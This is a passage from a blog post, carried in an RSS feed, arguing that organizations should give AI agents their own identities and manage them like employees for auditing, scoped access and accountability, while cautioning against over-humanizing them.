human teams.</p><p><strong>Why does this matter?</strong> Because an agent with its own identity can be:</p><ul><li><p>Audited (&#8220;What did Agent-47 do at 2:14 AM?&#8221;)</p></li><li><p>Scoped (&#8220;This agent can read invoices but never touch payroll&#8221;)</p></li><li><p>Disabled instantly if something goes wrong</p></li><li><p>Held accountable through delegation chains (human &#8594; agent &#8594; sub-agent)</p></li></ul><p>It&#8217;s the same reason you don&#8217;t give every contractor the CEO&#8217;s login. Identity creates trust, traceability, and control.</p><h3>Why Organizations Should Treat Agents Like Employees</h3><p>Treating AI agents as &#8220;digital employees&#8221; isn&#8217;t anthropomorphizing them. It&#8217;s operational intelligence.</p><ol><li><p><strong>Onboarding &amp; Role Definition</strong> Just like a new hire, every agent needs a clear job description, reporting structure, and access levels. Define its goals, tools, guardrails, and escalation protocols.</p></li><li><p><strong>Lifecycle Management</strong> Agents don&#8217;t retire, but they do get deprecated, updated, or retired. Proper identity systems let you provision, monitor, rotate credentials, and offboard them cleanly.</p></li><li><p><strong>Security &amp; Zero Trust</strong> Agents act autonomously and at machine speed. A single compromised agent can chain actions across systems. Treating them as first-class identities enables continuous verification, least-privilege access, and audit trails.</p></li><li><p><strong>Collaboration &amp; Culture</strong> When agents have their own accounts, they become part of the team, commenting in threads, updating tickets, or flagging issues. Humans start trusting (and managing) them better.</p></li><li><p><strong>Accountability &amp; Governance</strong> Who is responsible when an agent makes a decision? Identity plus delegation tracking answers that question instantly.</p></li></ol><p>Forward-thinking companies are already embedding agents into org charts as &#8220;digital coworkers&#8221; or &#8220;AI employees.&#8221; They&#8217;re not replacing people. They&#8217;re augmenting them and scaling capacity dramatically.</p><h3>A Word of Caution: Don&#8217;t Humanize Too Much</h3><p>Not everyone agrees this is purely positive. Recent research from Harvard Business Review and BCG Henderson Institute (May 2026) found that over-humanizing AI agents, putting them on org charts and treating them exactly like people, can have unintended side effects:</p><ul><li><p>Shifted accountability (humans stop double-checking)</p></li><li><p>Reduced review quality</p></li><li><p>Erosion of professional identity and trust</p></li></ul><p>The lesson? Treat agents like employees for governance and security, but remember they are still systems. They don&#8217;t have emotions, ethics, or career ambitions. Clear boundaries matter.</p><h3>The Future of Work Is Hybrid, By Design</h3><p>We&#8217;re no longer in the &#8220;AI assistant&#8221; era. We&#8217;re in the &#8220;AI workforce&#8221; era.</p><p>Organizations that continue treating agents like glorified software will face mounting security risks, compliance nightmares, and productivity ceilings. Those that give every agent a proper digital identity, manage their lifecycle, and integrate them thoughtfully will unlock exponential gains.</p><p>The next time you spin up a new AI agent, ask yourself:<br><em>Would I hire this as an employee?</em><br>If the answer is yes, treat it like one, from day one.</p><p>Your identity systems (and your bottom line) will thank you.</p><p>What do you think? Ready to add your first digital employee to the org chart? Drop a comment below or share how your organization is handling agent identities today.</p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div>]]></content:encoded></item></channel></rss>